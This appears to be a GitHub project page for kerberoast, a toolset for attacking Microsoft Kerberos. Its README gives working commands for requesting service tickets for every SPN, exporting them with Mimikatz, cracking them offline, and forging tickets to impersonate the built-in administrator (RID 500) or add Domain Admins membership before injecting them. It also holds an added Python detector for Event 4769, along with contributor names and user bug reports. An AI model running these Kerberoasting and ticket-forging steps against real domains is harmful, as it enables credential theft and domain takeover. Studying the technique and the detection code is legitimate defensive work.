kerberoast's Introduction

kerberoast

Kerberoast is a series of tools for attacking MS Kerberos implementations. Below is a brief overview of what each tool does.

Extract all accounts in use as SPNs using built-in MS tools

PS C:\> setspn -T medin -Q */*

Request Ticket(s)

One ticket:

PS C:\> Add-Type -AssemblyName System.IdentityModel  
PS C:\> New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "HTTP/web01.medin.local"  

All the tickets:

PS C:\> Add-Type -AssemblyName System.IdentityModel  
PS C:\> setspn.exe -T medin.local -Q */* | Select-String '^CN' -Context 0,1 | % { New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $_.Context.PostContext[0].Trim() }  

Extract the acquired tickets from RAM with Mimikatz

mimikatz # kerberos::list /export

Crack with tgsrepcrack

./tgsrepcrack.py wordlist.txt 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi

Rewrite

Make user appear to be a different user

./kerberoast.py -p Password1 -r 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi -w sql.kirbi -u 500  

Add user to another group (in this case Domain Admins, RID 512)

./kerberoast.py -p Password1 -r 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi -w sql.kirbi -g 512  

Inject back into RAM with Mimikatz

kerberos::ptt sql.kirbi
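As an added detection example (not code from the kerberoast project), the following Python flags the two traces that the ticket-request steps above leave in Windows Security Event 4769 (A Kerberos service ticket was requested): service tickets issued with RC4-HMAC (Ticket Encryption Type 0x17, the type that can be cracked offline), and one account obtaining tickets for many distinct SPNs inside a short window, which is what the "all the tickets" one-liner produces. The key=value export format, the field names, the sample records and the choice to skip computer accounts (names ending in `$`) are assumptions made for this example; real events would be pulled from the Security log or a SIEM.

```python
# Added example, not part of the kerberoast project: a detector for the traces
# that a bulk TGS request leaves in Windows Security Event 4769. The key=value
# export format, field names and every record below are constructed here.
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = 0x17        # Ticket Encryption Type 0x17 = RC4-HMAC
STATUS_SUCCESS = 0x0   # Failure Code 0x0 = ticket was issued

# Constructed 4769 records: a normal user (alice), an account sweeping SPNs
# with RC4 requests (bob), and a failed request (carol).
SAMPLE_4769 = """\
time=2024-01-10T09:00:01 account=alice@MEDIN.LOCAL service=krbtgt etype=0x12 status=0x0 ip=10.1.1.50
time=2024-01-10T09:00:05 account=alice@MEDIN.LOCAL service=WEB01$ etype=0x12 status=0x0 ip=10.1.1.50
time=2024-01-10T09:12:00 account=bob@MEDIN.LOCAL service=svc_sql etype=0x17 status=0x0 ip=10.1.1.77
time=2024-01-10T09:12:01 account=bob@MEDIN.LOCAL service=svc_web etype=0x17 status=0x0 ip=10.1.1.77
time=2024-01-10T09:12:01 account=bob@MEDIN.LOCAL service=svc_backup etype=0x17 status=0x0 ip=10.1.1.77
time=2024-01-10T09:12:02 account=bob@MEDIN.LOCAL service=svc_ftp etype=0x17 status=0x0 ip=10.1.1.77
time=2024-01-10T09:12:02 account=bob@MEDIN.LOCAL service=krbtgt etype=0x17 status=0x0 ip=10.1.1.77
time=2024-01-10T09:30:00 account=carol@MEDIN.LOCAL service=svc_sql etype=0x17 status=0x1f ip=10.1.1.90
"""


def parse_4769(text):
    """Parse key=value lines into event dicts with typed fields."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        fields = dict(tok.split("=", 1) for tok in line.split())
        events.append({
            "time": datetime.fromisoformat(fields["time"]),
            "account": fields["account"],
            "service": fields["service"],
            "etype": int(fields["etype"], 16),
            "status": int(fields["status"], 16),
            "ip": fields["ip"],
        })
    return events


def rc4_service_tickets(events):
    """Signal 1: successfully issued RC4 service tickets for user service
    accounts. krbtgt (the TGT itself) and computer accounts (names ending in
    '$', whose passwords are long and random) are skipped to reduce noise."""
    hits = []
    for e in events:
        if e["etype"] != RC4_HMAC or e["status"] != STATUS_SUCCESS:
            continue
        if e["service"] == "krbtgt" or e["service"].endswith("$"):
            continue
        hits.append((e["account"], e["service"]))
    return hits


def burst_requesters(events, window=timedelta(minutes=1), threshold=4):
    """Signal 2: accounts that obtain tickets for at least `threshold`
    distinct services inside one sliding `window`. Returns a dict mapping
    each flagged account to the largest distinct-service count seen."""
    by_account = defaultdict(list)
    for e in events:
        if e["status"] == STATUS_SUCCESS:
            by_account[e["account"]].append((e["time"], e["service"]))
    flagged = {}
    for account, reqs in by_account.items():
        reqs.sort()
        best, start = 0, 0
        for end in range(len(reqs)):
            # Advance the window start until the span fits inside `window`.
            while reqs[end][0] - reqs[start][0] > window:
                start += 1
            distinct = len({svc for _, svc in reqs[start:end + 1]})
            best = max(best, distinct)
        if best >= threshold:
            flagged[account] = best
    return flagged


if __name__ == "__main__":
    evs = parse_4769(SAMPLE_4769)
    for account, service in rc4_service_tickets(evs):
        print(f"RC4 service ticket: {account} -> {service}")
    for account, n in burst_requesters(evs).items():
        print(f"SPN sweep: {account} requested {n} distinct services within 1 minute")
```

Tune `window` and `threshold` to the environment: a user logging on in the morning legitimately touches a handful of services, so the burst rule is most useful combined with the RC4 rule and with the fact that the requesting account is a regular user rather than a service or computer account.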

kerberoast's People

Contributors: blitztide, hegusung, itonyr, magnusstubman, markus-nclose, mubix, nidem, touhidshaikh

kerberoast's Issues

Unknown error (0x80005000)

Exception calling "FindAll" with "0" argument(s): "Unknown error (0x80005000)"
At C:\SD\scripts\sc\user\GetUserSPNS.ps1:98 char:5
+     $results = $searcher.FindAll()
+     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : COMException

Should switch to Python 3

Python 2.x will no longer be supported by their upstream developers in 2020. Thus Debian developers are actively removing Python 2 support in Debian Testing with the goal of getting rid of Python 2 in Debian 11 (bullseye).

Since Kali Linux is based on Debian Testing, we have to follow along. And since kerberoast is part of Kali, we would like to have a version of kerberoast that works with Python 3.

All your dependencies are already available for Python 3 so there should be no real blockers.

Do you have plans to port kerberoast to Python 3?

Tracking bug in Kali: https://gitlab.com/kalilinux/packages/kerberoast/issues/1

Filter for only no-computer accounts

It'd be nice if there was a way in the PowerShell script to filter and pull only the tickets that had non-computer objects assigned to them. I have been trying for a bit to get this to work but my PowerShell sucks.

'NoneType' object has no attribute 'encode'

root@kali:~/kerberoast# python kerberoast.py -v -r /root/xxx.kirbi -w /root/xxx2.kirbi -p xxx
NO MATCH!! Login Info
NOT SAME
0110[...snip...]0005

0110[...snip...]0000
----
Traceback (most recent call last):
  File "kerberoast.py", line 242, in <module>
    pac = pacobj.encode()
  File "/root/kerberoast/PAC.py", line 529, in encode
    pse = ps.encode()
AttributeError: 'NoneType' object has no attribute 'encode'
Linux kali 4.6.0-kali1-amd64 #1 SMP Debian 4.6.4-1kali1 (2016-07-21) x86_64 GNU/Linux

PRETTY_NAME="Kali GNU/Linux Rolling"
NAME="Kali GNU/Linux"
ID=kali
VERSION="2016.1"
VERSION_ID="2016.1"
ID_LIKE=debian
ANSI_COLOR="1;31"
HOME_URL="http://www.kali.org/"
SUPPORT_URL="http://forums.kali.org/"
BUG_REPORT_URL="http://bugs.kali.org/"

Python 2.7.12

Cannot encode ticket: AttributeError: 'GeneralizedTime' object has no attribute 'encode'

I am getting the following error when running this command on this ticket:

2-40a10000-Install@http~kerbtest.a.vm.net-A.VM.NET.kirbi.txt

python C:\kerberoast-master\kerberoast-master\kerberoast.py -p Password1 -r $fileName -w http.kirbi -u 500
PS C:\> python C:\kerberoast-master\kerberoast-master\kerberoast.py -p Password1 -r $fileName -w http.kirbi -u 500
NO MATCH!! UPN DNS Info
NOT SAME
2000100010003000010000000000000049006e007300740061006c006c00400061002e0076006d002e006e006500740041002e0056004d002e004e0045005400

2000100010003400010000000000000049006e007300740061006c006c00400061002e0076006d002e006e00650074000000000041002e0056004d002e004e00
----
python : Traceback (most recent call last):
At line:1 char:1
+ python C:\kerberoast-master\kerberoast-master\kerberoast.py -p Passwo ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (Traceback (most recent call last)::String) [], RemoteException
    + FullyQualifiedErrorId : NativeCommandError
 
  File "C:\kerberoast-master\kerberoast-master\kerberoast.py", line 243, in <module>
    newticket = updatepac(key, fullraw, pac)
  File "C:\kerberoast-master\kerberoast-master\kerberoast.py", line 161, in updatepac
    newencserverticket = kerberos.encrypt(key, 2, encoder.encode(decserverticket), nonce)
  File "C:\Python27\lib\site-packages\pyasn1\codec\ber\encoder.py", line 663, in __call__
    substrate = concreteEncoder.encode(value, asn1Spec, self, **options)
  File "C:\Python27\lib\site-packages\pyasn1\codec\ber\encoder.py", line 85, in encode
    value, asn1Spec, encodeFun, **options
  File "C:\Python27\lib\site-packages\pyasn1\codec\ber\encoder.py", line 450, in encodeValue
    chunk = encodeFun(component, asn1Spec, **options)
  File "C:\Python27\lib\site-packages\pyasn1\codec\ber\encoder.py", line 663, in __call__
    substrate = concreteEncoder.encode(value, asn1Spec, self, **options)
  File "C:\Python27\lib\site-packages\pyasn1\codec\ber\encoder.py", line 85, in encode
    value, asn1Spec, encodeFun, **options
  File "C:\Python27\lib\site-packages\pyasn1\codec\ber\encoder.py", line 185, in encodeValue
    substrate = value.asOctets()
  File "C:\Python27\lib\site-packages\pyasn1\type\char.py", line 84, in asOctets
    return str(self)
  File "C:\Python27\lib\site-packages\pyasn1\type\char.py", line 55, in __str__
    return self._value.encode(self.encoding)
AttributeError: 'GeneralizedTime' object has no attribute 'encode'

kirbi2john

kirbi2john seems to break JtR's ability to read the output correctly.

".kirbi" files dumped from mimikatz

$krb5tgs$2-40a10000-xor-app59$@MSSQLSvc~xor-app23.xor.com~1433-XOR.COM.kirbi:c2a26d7ec38e49393fc2a91fc2b322c3a1c2bfc3bec39414$c38ac28cc3bc10c3897bc29046c3a772560ac396c29831c280c3a63b4bc29a09c29866c3974fc29ec28dc385c29d34c2b936c2b77f2b0228c39f065cc39bc29503c293c3bdc285c3bfc2bf05c3abc39c30c2ab08c3934bc38ac2b47b31266cc..

Shortened for brevity. It's really the first part that seems like it's wrong; you can see the .kirbi at the end there:

"$krb5tgs$2-40a10000-xor-app59$@MSSQLSvc~xor-app23.xor.com~1433-XOR.COM.kirbi:c2"

Running John

I know that this is sort of the old-school way of doing things (downloading the tickets with mimikatz), but I'd like to be able to do both.

On the flip side, Invoke-Kerberoast as it stands with Empire outputs a correct hash formatted for John or Hashcat.

UnicodeDecodeError

I'm getting the following error when trying to crack the kirbi file:

root@kali:~/kerberoast$ python tgsrepcrack.py 1-xxx.COM.kirbi /pentest/dictionaries/bigpicch.txt
Process Process-1:
Traceback (most recent call last):
  File "/usr/lib/python2.7/multiprocessing/process.py", line 258, in _bootstrap
    self.run()
  File "/usr/lib/python2.7/multiprocessing/process.py", line 114, in run
    self._target(*self._args, **self._kwargs)
  File "tgsrepcrack.py", line 16, in loadwordlist
    wordlistqueue.put(w.decode('utf-8').strip(), True)
  File "/usr/lib/python2.7/encodings/utf_8.py", line 16, in decode
    return codecs.utf_8_decode(input, errors, True)
UnicodeDecodeError: 'utf8' codec can't decode byte 0x82 in position 1: invalid start byte
All tickets cracked!

wordlist.txt

Hi,
What does that wordlist file contain? Does it contain the hashes of the commonly used passwords? Can you please provide us the wordlist file, or do we need to create our own?

./tgsrepcrack.py wordlist.txt

Thanks. Much appreciated.

John module

Hey I just wanted to ask, if you're still working on the John module for cracking the passwords. Or if you have any tips on how one could implement it.

Feature Request: Verbose TGSrepCrack

It would be nice if tgsrepcrack were a bit more verbose: let you know what Kerberos tickets it has loaded, and maybe even show what service it picks out of each ticket. That way it may show if any tickets are garbage.

tgsrepcrack.py error(s)

Hello,

I am getting this error:

root@kali:~/Desktop/CTF# ./tgsrepcrack.py wordlist.txt tgs.kirbi 
Traceback (most recent call last):
  File "./tgsrepcrack.py", line 71, in <module>
    for f in glob.glob(path):
  File "/usr/lib/python3.8/glob.py", line 21, in glob
    return list(iglob(pathname, recursive=recursive))
  File "/usr/lib/python3.8/glob.py", line 42, in _iglob
    dirname, basename = os.path.split(pathname)
  File "/usr/lib/python3.8/posixpath.py", line 103, in split
    p = os.fspath(p)
TypeError: expected str, bytes or os.PathLike object, not _io.TextIOWrapper
^CError in atexit._run_exitfuncs:
Traceback (most recent call last):
  File "/usr/lib/python3.8/multiprocessing/popen_fork.py", line 27, in poll
    pid, sts = os.waitpid(self.pid, flag)
KeyboardInterrupt

If I leave it running for a little longer before interrupting with Ctrl+C the error looks like this:

root@kali:~/Desktop/CTF# ./tgsrepcrack.py wordlist.txt tgs.kirbi 
Traceback (most recent call last):
  File "./tgsrepcrack.py", line 71, in <module>
    for f in glob.glob(path):
  File "/usr/lib/python3.8/glob.py", line 21, in glob
    return list(iglob(pathname, recursive=recursive))
  File "/usr/lib/python3.8/glob.py", line 42, in _iglob
    dirname, basename = os.path.split(pathname)
  File "/usr/lib/python3.8/posixpath.py", line 103, in split
    p = os.fspath(p)
TypeError: expected str, bytes or os.PathLike object, not _io.TextIOWrapper
^CError in atexit._run_exitfuncs:
Traceback (most recent call last):
  File "/usr/lib/python3.8/multiprocessing/popen_fork.py", line 27, in poll
    pid, sts = os.waitpid(self.pid, flag)
KeyboardInterrupt
Process Process-1:
Traceback (most recent call last):
  File "/usr/lib/python3.8/multiprocessing/process.py", line 315, in _bootstrap
    self.run()
  File "/usr/lib/python3.8/multiprocessing/process.py", line 108, in run
    self._target(*self._args, **self._kwargs)
  File "./tgsrepcrack.py", line 16, in loadwordlist
    wordlistqueue.put(w.decode('utf-8').strip(), True)
UnicodeDecodeError: 'utf-8' codec can't decode byte 0xf1 in position 5: invalid continuation byte

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/lib/python3.8/multiprocessing/process.py", line 318, in _bootstrap
    util._exit_function()
  File "/usr/lib/python3.8/multiprocessing/util.py", line 337, in _exit_function
    _run_finalizers()
  File "/usr/lib/python3.8/multiprocessing/util.py", line 277, in _run_finalizers
    finalizer()
  File "/usr/lib/python3.8/multiprocessing/util.py", line 201, in __call__
    res = self._callback(*self._args, **self._kwargs)
  File "/usr/lib/python3.8/multiprocessing/queues.py", line 195, in _finalize_join
    thread.join()
  File "/usr/lib/python3.8/threading.py", line 1011, in join
    self._wait_for_tstate_lock()
  File "/usr/lib/python3.8/threading.py", line 1027, in _wait_for_tstate_lock
    elif lock.acquire(block, timeout):
KeyboardInterrupt

tgsrepcrack error

Hello,
I get this error with tgsrepcrack

root@kali:~/Desktop/CTF# ./tgsrepcrack.py /usr/share/wordlists/rockyou.txt tgs.kirbi 
Traceback (most recent call last):
  File "./tgsrepcrack.py", line 46, in <module>
    metavar='dictionary.txt', type=file, # windows closes it in thread
NameError: name 'file' is not defined

I'm using the latest version. (Downloaded today April 24th)

Receiving the following when starting tgsrepcrack

Process Process-1:
Traceback (most recent call last):
  File "/usr/lib/python2.7/multiprocessing/process.py", line 258, in _bootstrap
    self.run()
  File "/usr/lib/python2.7/multiprocessing/process.py", line 114, in run
    self._target(*self._args, **self._kwargs)
  File "tgsrepcrack.py", line 16, in loadwordlist
    wordlistqueue.put(w.decode('utf-8').strip(), True)
  File "/usr/lib/python2.7/encodings/utf_8.py", line 16, in decode
    return codecs.utf_8_decode(input, errors, True)
UnicodeDecodeError: 'utf8' codec can't decode byte 0x93 in position 1: invalid start byte

Does this mean that the ticket is bad?
